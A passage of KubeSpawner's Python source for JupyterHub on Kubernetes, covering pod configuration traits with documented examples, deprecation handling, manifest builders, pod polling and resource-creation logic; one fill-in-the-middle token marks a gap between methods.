for more information on how StorageClasses work.
""",
)
storage_access_modes = List(
["ReadWriteOnce"],
config=True,
help="""
List of access modes the user has for the pvc.
The access modes are:
- `ReadWriteOnce` : the volume can be mounted as read-write by a single node
- `ReadOnlyMany` : the volume can be mounted read-only by many nodes
- `ReadWriteMany` : the volume can be mounted as read-write by many nodes
See `the Kubernetes documentation <https://kubernetes.io/docs/concepts/storage/persistent-volumes/#access-modes>`__
for more information on how access modes work.
""",
)
storage_selector = Dict(
config=True,
help="""
The dictionary Selector labels used to match a PersistentVolumeClaim to
a PersistentVolume.
Default is None and means it will match based only on other storage criteria.
For example to match the Nodes that have a label of `content: jupyter` use::
c.KubeSpawner.storage_selector = {'matchLabels':{'content': 'jupyter'}}
`{username}`, `{userid}`, `{servername}`, `{hubnamespace}`,
`{unescaped_username}`, and `{unescaped_servername}` will be expanded if
found within strings of this configuration. The username and servername
come escaped to follow the [DNS label
standard](https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#dns-label-names).
""",
)
lifecycle_hooks = Dict(
config=True,
help="""
Kubernetes lifecycle hooks to set on the spawned single-user pods.
The keys is name of hooks and there are only two hooks, postStart and preStop.
The values are handler of hook which executes by Kubernetes management system when hook is called.
Below is an sample copied from
`the Kubernetes documentation <https://kubernetes.io/docs/tasks/configure-pod-container/attach-handler-lifecycle-event/>`__::
c.KubeSpawner.lifecycle_hooks = {
"postStart": {
"exec": {
"command": ["/bin/sh", "-c", "echo Hello from the postStart handler > /usr/share/message"]
}
},
"preStop": {
"exec": {
"command": ["/usr/sbin/nginx", "-s", "quit"]
}
}
}
See `the Kubernetes documentation <https://kubernetes.io/docs/concepts/containers/container-lifecycle-hooks/>`__
for more info on what lifecycle hooks are and why you might want to use them!
""",
)
init_containers = List(
config=True,
help="""
List of initialization containers belonging to the pod.
This list will be directly added under `initContainers` in the kubernetes pod spec,
so you should use the same structure. Each item in the dict must a field
of the `V1Container specification <https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#container-v1-core>`__
One usage is disabling access to metadata service from single-user
notebook server with configuration below::
c.KubeSpawner.init_containers = [{
"name": "init-iptables",
"image": "<image with iptables installed>",
"command": ["iptables", "-A", "OUTPUT", "-p", "tcp", "--dport", "80", "-d", "169.254.169.254", "-j", "DROP"],
"securityContext": {
"capabilities": {
"add": ["NET_ADMIN"]
}
}
}]
See `the Kubernetes documentation <https://kubernetes.io/docs/concepts/workloads/pods/init-containers/>`__
for more info on what init containers are and why you might want to use them!
To user this feature, Kubernetes version must greater than 1.6.
""",
)
extra_container_config = Dict(
config=True,
help="""
Extra configuration (e.g. ``envFrom``) for notebook container which is not covered by other attributes.
This dict will be directly merge into `container` of notebook server,
so you should use the same structure. Each item in the dict must a field
of the `V1Container specification <https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#container-v1-core>`__.
One usage is set ``envFrom`` on notebook container with configuration below::
c.KubeSpawner.extra_container_config = {
"envFrom": [{
"configMapRef": {
"name": "special-config"
}
}]
}
The key could be either a camelCase word (used by Kubernetes yaml, e.g.
``envFrom``) or a snake_case word (used by Kubernetes Python client,
e.g. ``env_from``).
""",
)
extra_pod_config = Dict(
config=True,
help="""
Extra configuration for the pod which is not covered by other attributes.
This dict will be directly merge into pod,so you should use the same structure.
Each item in the dict is field of pod configuration
which follows spec at https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#podspec-v1-core
One usage is set restartPolicy and dnsPolicy with configuration below::
c.KubeSpawner.extra_pod_config = {
"restartPolicy": "OnFailure",
"dns_policy": "ClusterFirstWithHostNet"
}
The `key` could be either a camelCase word (used by Kubernetes yaml,
e.g. `restartPolicy`) or a snake_case word (used by Kubernetes Python
client, e.g. `dns_policy`).
""",
)
extra_containers = List(
config=True,
help="""
List of containers belonging to the pod which besides to the container generated for notebook server.
This list will be directly appended under `containers` in the kubernetes pod spec,
so you should use the same structure. Each item in the list is container configuration
which follows spec at https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#container-v1-core
One usage is setting crontab in a container to clean sensitive data with configuration below::
c.KubeSpawner.extra_containers = [{
"name": "crontab",
"image": "supercronic",
"command": ["/usr/local/bin/supercronic", "/etc/crontab"]
}]
`{username}`, `{userid}`, `{servername}`, `{hubnamespace}`,
`{unescaped_username}`, and `{unescaped_servername}` will be expanded if
found within strings of this configuration. The username and servername
come escaped to follow the [DNS label
standard](https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#dns-label-names).
""",
)
# FIXME: Don't override 'default_value' ("") or 'allow_none' (False) (Breaking change)
scheduler_name = Unicode(
None,
allow_none=True,
config=True,
help="""
Set the pod's scheduler explicitly by name. See `the Kubernetes documentation <https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#podspec-v1-core>`__
for more information.
""",
)
tolerations = List(
config=True,
help="""
List of tolerations that are to be assigned to the pod in order to be able to schedule the pod
on a node with the corresponding taints. See the official Kubernetes documentation for additional details
https://kubernetes.io/docs/concepts/configuration/taint-and-toleration/
Pass this field an array of `"Toleration" objects
* https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#toleration-v1-core
Example::
[
{
'key': 'key',
'operator': 'Equal',
'value': 'value',
'effect': 'NoSchedule'
},
{
'key': 'key',
'operator': 'Exists',
'effect': 'NoSchedule'
}
]
""",
)
node_affinity_preferred = List(
config=True,
help="""
Affinities describe where pods prefer or require to be scheduled, they
may prefer or require a node to have a certain label or be in proximity
/ remoteness to another pod. To learn more visit
https://kubernetes.io/docs/concepts/configuration/assign-pod-node/
Pass this field an array of "PreferredSchedulingTerm" objects.*
* https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#preferredschedulingterm-v1-core
""",
)
node_affinity_required = List(
config=True,
help="""
Affinities describe where pods prefer or require to be scheduled, they
may prefer or require a node to have a certain label or be in proximity
/ remoteness to another pod. To learn more visit
https://kubernetes.io/docs/concepts/configuration/assign-pod-node/
Pass this field an array of "NodeSelectorTerm" objects.*
* https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#nodeselectorterm-v1-core
""",
)
pod_affinity_preferred = List(
config=True,
help="""
Affinities describe where pods prefer or require to be scheduled, they
may prefer or require a node to have a certain label or be in proximity
/ remoteness to another pod. To learn more visit
https://kubernetes.io/docs/concepts/configuration/assign-pod-node/
Pass this field an array of "WeightedPodAffinityTerm" objects.*
* https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#weightedpodaffinityterm-v1-core
""",
)
pod_affinity_required = List(
config=True,
help="""
Affinities describe where pods prefer or require to be scheduled, they
may prefer or require a node to have a certain label or be in proximity
/ remoteness to another pod. To learn more visit
https://kubernetes.io/docs/concepts/configuration/assign-pod-node/
Pass this field an array of "PodAffinityTerm" objects.*
* https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#podaffinityterm-v1-core
""",
)
pod_anti_affinity_preferred = List(
config=True,
help="""
Affinities describe where pods prefer or require to be scheduled, they
may prefer or require a node to have a certain label or be in proximity
/ remoteness to another pod. To learn more visit
https://kubernetes.io/docs/concepts/configuration/assign-pod-node/
Pass this field an array of "WeightedPodAffinityTerm" objects.*
* https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#weightedpodaffinityterm-v1-core
""",
)
pod_anti_affinity_required = List(
config=True,
help="""
Affinities describe where pods prefer or require to be scheduled, they
may prefer or require a node to have a certain label or be in proximity
/ remoteness to another pod. To learn more visit
https://kubernetes.io/docs/concepts/configuration/assign-pod-node/
Pass this field an array of "PodAffinityTerm" objects.*
* https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#podaffinityterm-v1-core
""",
)
extra_resource_guarantees = Dict(
config=True,
help="""
The dictionary used to request arbitrary resources.
Default is None and means no additional resources are requested.
For example, to request 1 Nvidia GPUs::
c.KubeSpawner.extra_resource_guarantees = {"nvidia.com/gpu": "1"}
""",
)
extra_resource_limits = Dict(
config=True,
help="""
The dictionary used to limit arbitrary resources.
Default is None and means no additional resources are limited.
For example, to add a limit of 3 Nvidia GPUs::
c.KubeSpawner.extra_resource_limits = {"nvidia.com/gpu": "3"}
""",
)
delete_stopped_pods = Bool(
True,
config=True,
help="""
Whether to delete pods that have stopped themselves.
Set to False to leave stopped pods in the completed state,
allowing for easier debugging of why they may have stopped.
""",
)
profile_form_template = Unicode(
"""
<style>
/* The profile description should not be bold, even though it is inside the <label> tag */
#kubespawner-profiles-list label p {
font-weight: normal;
}
</style>
<div class='form-group' id='kubespawner-profiles-list'>
{% for profile in profile_list %}
<label for='profile-item-{{ profile.slug }}' class='form-control input-group'>
<div class='col-md-1'>
<input type='radio' name='profile' id='profile-item-{{ profile.slug }}' value='{{ profile.slug }}' {% if profile.default %}checked{% endif %} />
</div>
<div class='col-md-11'>
<strong>{{ profile.display_name }}</strong>
{% if profile.description %}
<p>{{ profile.description }}</p>
{% endif %}
</div>
</label>
{% endfor %}
</div>
""",
config=True,
help="""
Jinja2 template for constructing profile list shown to user.
Used when `profile_list` is set.
The contents of `profile_list` are passed in to the template.
This should be used to construct the contents of a HTML form. When
posted, this form is expected to have an item with name `profile` and
the value the index of the profile in `profile_list`.
""",
)
profile_list = Union(
trait_types=[List(trait=Dict()), Callable()],
config=True,
help="""
List of profiles to offer for selection by the user.
Signature is: `List(Dict())`, where each item is a dictionary that has two keys:
- `display_name`: the human readable display name (should be HTML safe)
- `slug`: the machine readable slug to identify the profile
(missing slugs are generated from display_name)
- `description`: Optional description of this profile displayed to the user.
- `kubespawner_override`: a dictionary with overrides to apply to the KubeSpawner
settings. Each value can be either the final value to change or a callable that
take the `KubeSpawner` instance as parameter and return the final value.
- `default`: (optional Bool) True if this is the default selected option
Example::
c.KubeSpawner.profile_list = [
{
'display_name': 'Training Env - Python',
'slug': 'training-python',
'default': True,
'kubespawner_override': {
'image': 'training/python:label',
'cpu_limit': 1,
'mem_limit': '512M',
}
}, {
'display_name': 'Training Env - Datascience',
'slug': 'training-datascience',
'kubespawner_override': {
'image': 'training/datascience:label',
'cpu_limit': 4,
'mem_limit': '8G',
}
}, {
'display_name': 'DataScience - Small instance',
'slug': 'datascience-small',
'kubespawner_override': {
'image': 'datascience/small:label',
'cpu_limit': 10,
'mem_limit': '16G',
}
}, {
'display_name': 'DataScience - Medium instance',
'slug': 'datascience-medium',
'kubespawner_override': {
'image': 'datascience/medium:label',
'cpu_limit': 48,
'mem_limit': '96G',
}
}, {
'display_name': 'DataScience - Medium instance (GPUx2)',
'slug': 'datascience-gpu2x',
'kubespawner_override': {
'image': 'datascience/medium:label',
'cpu_limit': 48,
'mem_limit': '96G',
'extra_resource_guarantees': {"nvidia.com/gpu": "2"},
}
}
]
Instead of a list of dictionaries, this could also be a callable that takes as one
parameter the current spawner instance and returns a list of dictionaries. The
callable will be called asynchronously if it returns a future, rather than
a list. Note that the interface of the spawner class is not deemed stable
across versions, so using this functionality might cause your JupyterHub
or kubespawner upgrades to break.
""",
)
priority_class_name = Unicode(
config=True,
help="""
The priority class that the pods will use.
See https://kubernetes.io/docs/concepts/configuration/pod-priority-preemption for
more information on how pod priority works.
""",
)
delete_grace_period = Integer(
1,
config=True,
help="""
Time in seconds for the pod to be in `terminating` state before is forcefully killed.
Increase this if you need more time to execute a `preStop` lifecycle hook.
See https://kubernetes.io/docs/concepts/workloads/pods/pod/#termination-of-pods for
more information on how pod termination works.
Defaults to `1`.
""",
)
# deprecate redundant and inconsistent singleuser_ and user_ prefixes:
_deprecated_traits_09 = [
"singleuser_working_dir",
"singleuser_service_account",
"singleuser_extra_labels",
"singleuser_extra_annotations",
"singleuser_image_spec",
"singleuser_image_pull_policy",
"singleuser_image_pull_secrets",
"singleuser_node_selector",
"singleuser_uid",
"singleuser_fs_gid",
"singleuser_supplemental_gids",
"singleuser_privileged",
"singleuser_allow_privilege_escalation" "singleuser_lifecycle_hooks",
"singleuser_extra_pod_config",
"singleuser_init_containers",
"singleuser_extra_container_config",
"singleuser_extra_containers",
"user_storage_class",
"user_storage_pvc_ensure",
"user_storage_capacity",
"user_storage_extra_labels",
"user_storage_access_modes",
]
# other general deprecations:
_deprecated_traits = {
'image_spec': ('image', '0.10'),
}
# add the bulk deprecations from 0.9
for _deprecated_name in _deprecated_traits_09:
_new_name = _deprecated_name.split('_', 1)[1]
_deprecated_traits[_deprecated_name] = (_new_name, '0.9')
@validate('config')
def _handle_deprecated_config(self, proposal):
config = proposal.value
if 'KubeSpawner' not in config:
# nothing to check
return config
for _deprecated_name, (_new_name, version) in self._deprecated_traits.items():
# for any `singleuser_name` deprecate in favor of `name`
if _deprecated_name not in config.KubeSpawner:
# nothing to do
continue
# remove deprecated value from config
_deprecated_value = config.KubeSpawner.pop(_deprecated_name)
self.log.warning(
"KubeSpawner.%s is deprecated in %s. Use KubeSpawner.%s instead",
_deprecated_name,
version,
_new_name,
)
if _new_name in config.KubeSpawner:
# *both* config values found,
# ignore deprecated config and warn about the collision
_new_value = config.KubeSpawner[_new_name]
# ignore deprecated config in favor of non-deprecated config
self.log.warning(
"Ignoring deprecated config KubeSpawner.%s = %r "
" in favor of KubeSpawner.%s = %r",
_deprecated_name,
_deprecated_value,
_new_name,
_new_value,
)
else:
# move deprecated config to its new home
config.KubeSpawner[_new_name] = _deprecated_value
return config
# define properties for deprecated names
# so we can propagate their values to the new traits.
# most deprecations should be handled via config above,
# but in case these are set at runtime, e.g. by subclasses
# or hooks, hook this up.
# The signature-order of these is funny
# because the property methods are created with
# functools.partial(f, name) so name is passed as the first arg
# before self.
def _get_deprecated(name, new_name, version, self):
# warn about the deprecated name
self.log.warning(
"KubeSpawner.%s is deprecated in %s. Use KubeSpawner.%s",
name,
version,
new_name,
)
return getattr(self, new_name)
def _set_deprecated(name, new_name, version, self, value):
# warn about the deprecated name
self.log.warning(
"KubeSpawner.%s is deprecated in %s. Use KubeSpawner.%s",
name,
version,
new_name,
)
return setattr(self, new_name, value)
for _deprecated_name, (_new_name, _version) in _deprecated_traits.items():
exec(
"""{0} = property(
partial(_get_deprecated, '{0}', '{1}', '{2}'),
partial(_set_deprecated, '{0}', '{1}', '{2}'),
)
""".format(
_deprecated_name,
_new_name,
_version,
)
)
del _deprecated_name
def _expand_user_properties(self, template):
# Make sure username and servername match the restrictions for DNS labels
# Note: '-' is not in safe_chars, as it is being used as escape character
safe_chars = set(string.ascii_lowercase + string.digits)
raw_servername = self.name or ''
safe_servername = escapism.escape(
raw_servername, safe=safe_chars, escape_char='-'
).lower()
hub_namespace = self._namespace_default()
if hub_namespace == "default":
hub_namespace = "user"
legacy_escaped_username = ''.join(
[s if s in safe_chars else '-' for s in self.user.name.lower()]
)
safe_username = escapism.escape(
self.user.name, safe=safe_chars, escape_char='-'
).lower()
rendered = template.format(
userid=self.user.id,
username=safe_username,
unescaped_username=self.user.name,
legacy_escape_username=legacy_escaped_username,
servername=safe_servername,
unescaped_servername=raw_servername,
hubnamespace=hub_namespace,
)
# strip trailing - delimiter in case of empty servername.
# k8s object names cannot have trailing -
return rendered.rstrip("-")
def _expand_all(self, src):
if isinstance(src, list):
return [self._expand_all(i) for i in src]
elif isinstance(src, dict):
return {k: self._expand_all(v) for k, v in src.items()}
elif isinstance(src, str):
return self._expand_user_properties(src)
else:
return src
def _build_common_labels(self, extra_labels):
# Default set of labels, picked up from
# https://github.com/helm/helm-www/blob/HEAD/content/en/docs/chart_best_practices/labels.md
labels = {
'hub.jupyter.org/username': escapism.escape(
self.user.name, safe=self.safe_chars, escape_char='-'
).lower()
}
labels.update(extra_labels)
labels.update(self.common_labels)
return labels
def _build_pod_labels(self, extra_labels):
labels = self._build_common_labels(extra_labels)
labels.update(
{
'component': self.component_label,
'hub.jupyter.org/servername': self.name,
}
)
return labels
def _build_common_annotations(self, extra_annotations):
# Annotations don't need to be escaped
annotations = {'hub.jupyter.org/username': self.user.name}
if self.name:
annotations['hub.jupyter.org/servername'] = self.name
annotations.update(extra_annotations)
return annotations<|fim▁hole|> @default("ssl_alt_names")
def _default_ssl_alt_names(self):
return [
f"DNS:{self.dns_name}",
f"DNS:{self.pod_name}",
f"DNS:{self.pod_name}.{self.namespace}",
f"DNS:{self.pod_name}.{self.namespace}.svc",
]
@default("ssl_alt_names_include_local")
def _default_ssl_alt_names_include_local(self):
return False
get_pod_url = Callable(
default_value=None,
allow_none=True,
config=True,
help="""Callable to retrieve pod url
Called with (spawner, pod)
Must not be async
""",
)
def _get_pod_url(self, pod):
"""Return the pod url
Default: use pod.status.pod_ip (dns_name if ssl is enabled)
"""
if self.get_pod_url:
# custom get_pod_url hook
return self.get_pod_url(self, pod)
if getattr(self, "internal_ssl", False):
proto = "https"
hostname = self.dns_name
else:
proto = "http"
hostname = pod["status"]["podIP"]
if self.pod_connect_ip:
hostname = ".".join(
[
s.rstrip("-")
for s in self._expand_user_properties(self.pod_connect_ip).split(
"."
)
]
)
return "{}://{}:{}".format(
proto,
hostname,
self.port,
)
async def get_pod_manifest(self):
"""
Make a pod manifest that will spawn current user's notebook pod.
"""
if callable(self.uid):
uid = await gen.maybe_future(self.uid(self))
else:
uid = self.uid
if callable(self.gid):
gid = await gen.maybe_future(self.gid(self))
else:
gid = self.gid
if callable(self.fs_gid):
fs_gid = await gen.maybe_future(self.fs_gid(self))
else:
fs_gid = self.fs_gid
if callable(self.supplemental_gids):
supplemental_gids = await gen.maybe_future(self.supplemental_gids(self))
else:
supplemental_gids = self.supplemental_gids
if callable(self.container_security_context):
csc = await gen.maybe_future(self.container_security_context(self))
else:
csc = self.container_security_context
if callable(self.pod_security_context):
psc = await gen.maybe_future(self.pod_security_context(self))
else:
psc = self.pod_security_context
args = self.get_args()
real_cmd = None
if self.cmd:
real_cmd = self.cmd + args
elif args:
self.log.warning(
f"Ignoring arguments when using implicit command from image: {args}."
" Set KubeSpawner.cmd explicitly to support passing cli arguments."
)
labels = self._build_pod_labels(self._expand_all(self.extra_labels))
annotations = self._build_common_annotations(
self._expand_all(self.extra_annotations)
)
return make_pod(
name=self.pod_name,
cmd=real_cmd,
port=self.port,
image=self.image,
image_pull_policy=self.image_pull_policy,
image_pull_secrets=self.image_pull_secrets,
node_selector=self.node_selector,
uid=uid,
gid=gid,
fs_gid=fs_gid,
supplemental_gids=supplemental_gids,
privileged=self.privileged,
allow_privilege_escalation=self.allow_privilege_escalation,
container_security_context=csc,
pod_security_context=psc,
env=self.get_env(),
volumes=self._expand_all(self.volumes),
volume_mounts=self._expand_all(self.volume_mounts),
working_dir=self.working_dir,
labels=labels,
annotations=annotations,
cpu_limit=self.cpu_limit,
cpu_guarantee=self.cpu_guarantee,
mem_limit=self.mem_limit,
mem_guarantee=self.mem_guarantee,
extra_resource_limits=self.extra_resource_limits,
extra_resource_guarantees=self.extra_resource_guarantees,
lifecycle_hooks=self.lifecycle_hooks,
init_containers=self._expand_all(self.init_containers),
service_account=self._expand_all(self.service_account),
automount_service_account_token=self.automount_service_account_token,
extra_container_config=self.extra_container_config,
extra_pod_config=self._expand_all(self.extra_pod_config),
extra_containers=self._expand_all(self.extra_containers),
scheduler_name=self.scheduler_name,
tolerations=self.tolerations,
node_affinity_preferred=self.node_affinity_preferred,
node_affinity_required=self.node_affinity_required,
pod_affinity_preferred=self.pod_affinity_preferred,
pod_affinity_required=self.pod_affinity_required,
pod_anti_affinity_preferred=self.pod_anti_affinity_preferred,
pod_anti_affinity_required=self.pod_anti_affinity_required,
priority_class_name=self.priority_class_name,
ssl_secret_name=self.secret_name if self.internal_ssl else None,
ssl_secret_mount_path=self.secret_mount_path,
logger=self.log,
)
def get_secret_manifest(self, owner_reference):
"""
Make a secret manifest that contains the ssl certificates.
"""
labels = self._build_common_labels(self._expand_all(self.extra_labels))
annotations = self._build_common_annotations(
self._expand_all(self.extra_annotations)
)
return make_secret(
name=self.secret_name,
username=self.user.name,
cert_paths=self.cert_paths,
hub_ca=self.internal_trust_bundles['hub-ca'],
owner_references=[owner_reference],
labels=labels,
annotations=annotations,
)
def get_service_manifest(self, owner_reference):
"""
Make a service manifest for dns.
"""
labels = self._build_common_labels(self._expand_all(self.extra_labels))
annotations = self._build_common_annotations(
self._expand_all(self.extra_annotations)
)
# TODO: validate that the service name
return make_service(
name=self.pod_name,
port=self.port,
servername=self.name,
owner_references=[owner_reference],
labels=labels,
annotations=annotations,
)
def get_pvc_manifest(self):
"""
Make a pvc manifest that will spawn current user's pvc.
"""
labels = self._build_common_labels(self._expand_all(self.storage_extra_labels))
labels.update({'component': 'singleuser-storage'})
annotations = self._build_common_annotations({})
storage_selector = self._expand_all(self.storage_selector)
return make_pvc(
name=self.pvc_name,
storage_class=self.storage_class,
access_modes=self.storage_access_modes,
selector=storage_selector,
storage=self.storage_capacity,
labels=labels,
annotations=annotations,
)
def is_pod_running(self, pod):
"""
Check if the given pod is running
pod must be a dictionary representing a Pod kubernetes API object.
"""
# FIXME: Validate if this is really the best way
is_running = (
pod is not None
and pod["status"]["phase"] == 'Running'
and pod["status"]["podIP"] is not None
and "deletionTimestamp" not in pod["metadata"]
and all([cs["ready"] for cs in pod["status"]["containerStatuses"]])
)
return is_running
def pod_has_uid(self, pod):
"""
Check if the given pod exists and has a UID
pod must be a dictionary representing a Pod kubernetes API object.
"""
return bool(
pod and pod.get("metadata") and pod["metadata"].get("uid") is not None
)
def get_state(self):
"""
Save state required to reinstate this user's pod from scratch
We save the `pod_name`, even though we could easily compute it,
because JupyterHub requires you save *some* state! Otherwise
it assumes your server is dead. This works around that.
It's also useful for cases when the `pod_template` changes between
restarts - this keeps the old pods around.
"""
state = super().get_state()
state['pod_name'] = self.pod_name
return state
def get_env(self):
"""Return the environment dict to use for the Spawner.
See also: jupyterhub.Spawner.get_env
"""
env = super(KubeSpawner, self).get_env()
# deprecate image
env['JUPYTER_IMAGE_SPEC'] = self.image
env['JUPYTER_IMAGE'] = self.image
return env
def load_state(self, state):
"""
Load state from storage required to reinstate this user's pod
Since this runs after `__init__`, this will override the generated `pod_name`
if there's one we have saved in state. These are the same in most cases,
but if the `pod_template` has changed in between restarts, it will no longer
be the case. This allows us to continue serving from the old pods with
the old names.
"""
if 'pod_name' in state:
self.pod_name = state['pod_name']
@_await_pod_reflector
async def poll(self):
"""
Check if the pod is still running.
Uses the same interface as subprocess.Popen.poll(): if the pod is
still running, returns None. If the pod has exited, return the
exit code if we can determine it, or 1 if it has exited but we
don't know how. These are the return values JupyterHub expects.
Note that a clean exit will have an exit code of zero, so it is
necessary to check that the returned value is None, rather than
just Falsy, to determine that the pod is still running.
"""
ref_key = "{}/{}".format(self.namespace, self.pod_name)
pod = self.pod_reflector.pods.get(ref_key, None)
if pod is not None:
if pod["status"]["phase"] == 'Pending':
return None
ctr_stat = pod["status"].get("containerStatuses")
if ctr_stat is None: # No status, no container (we hope)
# This seems to happen when a pod is idle-culled.
return 1
for c in ctr_stat:
# return exit code if notebook container has terminated
if c["name"] == 'notebook':
if "terminated" in c["state"]:
# call self.stop to delete the pod
if self.delete_stopped_pods:
await self.stop(now=True)
return c["state"]["terminated"]["exitCode"]
break
# pod running. Check and update server url if it changed!
# only do this if fully running, not just starting up
# and there's a stored url in self.server to check against
if self.is_pod_running(pod) and self.server:
def _normalize_url(url):
"""Normalize url to be comparable
- parse with urlparse
- Ensures port is always defined
"""
url = urlparse(url)
if url.port is None:
if url.scheme.lower() == "https":
url = url._replace(netloc=f"{url.hostname}:443")
elif url.scheme.lower() == "http":
url = url._replace(netloc=f"{url.hostname}:80")
return url
pod_url = _normalize_url(self._get_pod_url(pod))
server_url = _normalize_url(self.server.url)
# netloc: only compare hostname:port, ignore path
if server_url.netloc != pod_url.netloc:
self.log.warning(
f"Pod {ref_key} url changed! {server_url.netloc} -> {pod_url.netloc}"
)
self.server.ip = pod_url.hostname
self.server.port = pod_url.port
self.db.commit()
# None means pod is running or starting up
return None
# pod doesn't exist or has been deleted
return 1
@property
def events(self):
"""Filter event-reflector to just this pods events
Returns list of all events that match our pod_name
since our ._last_event (if defined).
._last_event is set at the beginning of .start().
"""
if not self.event_reflector:
return []
events = []
for event in self.event_reflector.events:
if event["involvedObject"]["name"] != self.pod_name:
# only consider events for my pod name
continue
if self._last_event and event["metadata"]["uid"] == self._last_event:
# saw last_event marker, ignore any previous events
# and only consider future events
# only include events *after* our _last_event marker
events = []
else:
events.append(event)
return events
async def progress(self):
"""
This function is reporting back the progress of spawning a pod until
self._start_future has fired.
This is working with events parsed by the python kubernetes client,
and here is the specification of events that is relevant to understand:
ref: https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#event-v1-core
"""
if not self.events_enabled:
return
self.log.debug('progress generator: %s', self.pod_name)
start_future = self._start_future
progress = 0
next_event = 0
break_while_loop = False
while True:
# This logic avoids a race condition. self._start() will be invoked by
# self.start() and almost directly set self._start_future. But,
# progress() will be invoked via self.start(), so what happen first?
# Due to this, the logic below is to avoid making an assumption that
# self._start_future was set before this function was called.
if start_future is None and self._start_future:
start_future = self._start_future
# Ensure we capture all events by inspecting events a final time
# after the start_future signal has fired, we could have been in
# .sleep() and missed something.
if start_future and start_future.done():
break_while_loop = True
events = self.events
len_events = len(events)
if next_event < len_events:
for i in range(next_event, len_events):
event = events[i]
# move the progress bar.
# Since we don't know how many events we will get,
# asymptotically approach 90% completion with each event.
# each event gets 33% closer to 90%:
# 30 50 63 72 78 82 84 86 87 88 88 89
progress += (90 - progress) / 3
yield {
'progress': int(progress),
'raw_event': event,
'message': "%s [%s] %s"
% (
event["lastTimestamp"] or event["eventTime"],
event["type"],
event["message"],
),
}
next_event = len_events
if break_while_loop:
break
await asyncio.sleep(1)
def _start_reflector(
self,
kind=None,
reflector_class=ResourceReflector,
replace=False,
**kwargs,
):
"""Start a shared reflector on the KubeSpawner class
kind: key for the reflector (e.g. 'pod' or 'events')
reflector_class: Reflector class to be instantiated
kwargs: extra keyword-args to be relayed to ReflectorClass
If replace=False and the pod reflector is already running,
do nothing.
If replace=True, a running pod reflector will be stopped
and a new one started (for recovering from possible errors).
"""
key = kind
ReflectorClass = reflector_class
def on_reflector_failure():
self.log.critical(
"%s reflector failed, halting Hub.",
key.title(),
)
sys.exit(1)
previous_reflector = self.__class__.reflectors.get(key)
if replace or not previous_reflector:
self.__class__.reflectors[key] = ReflectorClass(
parent=self,
namespace=self.namespace,
on_failure=on_reflector_failure,
**kwargs,
)
asyncio.ensure_future(self.__class__.reflectors[key].start())
if replace and previous_reflector:
# we replaced the reflector, stop the old one
asyncio.ensure_future(previous_reflector.stop())
# return the current reflector
return self.__class__.reflectors[key]
def _start_watching_events(self, replace=False):
"""Start the events reflector
If replace=False and the event reflector is already running,
do nothing.
If replace=True, a running pod reflector will be stopped
and a new one started (for recovering from possible errors).
"""
return self._start_reflector(
kind="events",
reflector_class=EventReflector,
fields={"involvedObject.kind": "Pod"},
omit_namespace=self.enable_user_namespaces,
replace=replace,
)
def _start_watching_pods(self, replace=False):
"""Start the pod reflector
If replace=False and the pod reflector is already running,
do nothing.
If replace=True, a running pod reflector will be stopped
and a new one started (for recovering from possible errors).
"""
pod_reflector_class = PodReflector
pod_reflector_class.labels.update({"component": self.component_label})
return self._start_reflector(
"pods",
PodReflector,
omit_namespace=self.enable_user_namespaces,
replace=replace,
)
def start(self):
"""Thin wrapper around self._start
so we can hold onto a reference for the Future
start returns, which we can use to terminate
.progress()
"""
self._start_future = asyncio.ensure_future(self._start())
return self._start_future
_last_event = None
async def _make_create_pod_request(self, pod, request_timeout):
"""
Make an HTTP request to create the given pod
Designed to be used with exponential_backoff, so returns
True / False on success / failure
"""
try:
self.log.info(
f"Attempting to create pod {pod.metadata.name}, with timeout {request_timeout}"
)
await asyncio.wait_for(
self.api.create_namespaced_pod(
self.namespace,
pod,
),
request_timeout,
)
return True
except asyncio.TimeoutError:
# Just try again
return False
except ApiException as e:
pod_name = pod.metadata.name
if e.status != 409:
# We only want to handle 409 conflict errors
self.log.exception("Failed for %s", pod.to_str())
raise
self.log.info(f'Found existing pod {pod_name}, attempting to kill')
# TODO: this should show up in events
await self.stop(True)
self.log.info(
f'Killed pod {pod_name}, will try starting singleuser pod again'
)
# We tell exponential_backoff to retry
return False
async def _make_create_pvc_request(self, pvc, request_timeout):
# Try and create the pvc. If it succeeds we are good. If
# returns a 409 indicating it already exists we are good. If
# it returns a 403, indicating potential quota issue we need
# to see if pvc already exists before we decide to raise the
# error for quota being exceeded. This is because quota is
# checked before determining if the PVC needed to be
# created.
pvc_name = pvc.metadata.name
try:
self.log.info(
f"Attempting to create pvc {pvc.metadata.name}, with timeout {request_timeout}"
)
await asyncio.wait_for(
self.api.create_namespaced_persistent_volume_claim(
namespace=self.namespace,
body=pvc,
),
request_timeout,
)
return True
except asyncio.TimeoutError:
# Just try again
return False
except ApiException as e:
if e.status == 409:
self.log.info(
"PVC " + pvc_name + " already exists, so did not create new pvc."
)
return True
elif e.status == 403:
t, v, tb = sys.exc_info()
try:
await self.api.read_namespaced_persistent_volume_claim(
name=pvc_name,
namespace=self.namespace,
)
except ApiException as e:
raise v.with_traceback(tb)
self.log.info(
"PVC "
+ self.pvc_name
+ " already exists, possibly have reached quota though."
)
return True
else:
raise
async def _ensure_not_exists(self, kind, name):
"""Ensure a resource does not exist
Request deletion and wait for it to be gone
Designed to be used with exponential_backoff, so returns
True when the resource no longer exists, False otherwise
"""
delete = getattr(self.api, "delete_namespaced_{}".format(kind))
read = getattr(self.api, "read_namespaced_{}".format(kind))
# first, attempt to delete the resource
try:
self.log.info(f"Deleting {kind}/{name}")
await asyncio.wait_for(
delete(namespace=self.namespace, name=name),
self.k8s_api_request_timeout,
)
except asyncio.TimeoutError:
# Just try again
return False
except ApiException as e:
if e.status == 404:
self.log.info(f"{kind}/{name} is gone")
# no such resource, delete successful
return True
self.log.exception("Error deleting {kind}/{name}: {e}")
return False
try:
